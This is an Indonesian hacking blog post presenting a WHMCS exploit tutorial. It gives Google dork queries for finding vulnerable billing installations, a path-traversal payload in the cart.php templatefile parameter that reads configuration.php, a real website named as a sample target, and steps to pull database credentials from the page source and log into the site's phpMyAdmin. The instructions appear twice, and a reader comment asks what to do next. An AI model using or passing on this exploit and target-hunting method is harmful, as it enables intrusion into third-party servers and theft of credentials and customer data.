Filename | Exploit Whmcs |
Permission | rwxr--r-- |
Author | Fell Sadiz |
Modified | 7/05/2012 12:29:00 AM |
Group | Exploit | Hacking | Tutorial |
Actions | |
Navigation | / Home / Exploit / Hacking / Tutorial / Exploit Whmcs |
Lakukan pencarian menggunakan Google Dork berikut :
#dapat disesuaikan dengan selera untuk mendapatkan target.
Exploit :
Sample Target : http//socialfansfinder.com/whmcs/cart.php?
*hapus semua link sesudah whmcs/ dan pastekan exploitnya disitw.
Sample POC : http//socialfansfinder.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php
Kemudian Liat Source kodenya menggunakan CTRL+U.
Terakhir Silahkan Login ke phpmyadmin situs tersebut http://domain.com/phpmyadmin .
inurl:whmcs/cart.php?a=
inurl:billing/cart.php?a=
#dapat disesuaikan dengan selera untuk mendapatkan target.
Exploit :
/cart.php?a=test&templatefile=../../../configuration.php
Sample Target : http//socialfansfinder.com/whmcs/cart.php?
*hapus semua link sesudah whmcs/ dan pastekan exploitnya disitw.
Sample POC : http//socialfansfinder.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php
Kemudian Liat Source kodenya menggunakan CTRL+U.
Terakhir Silahkan Login ke phpmyadmin situs tersebut http://domain.com/phpmyadmin .
1 Respons:
kalo udah masuk ke php my admin trus gimana lagi gan ?
kunbal ya gan ke denydanup.blogspot.com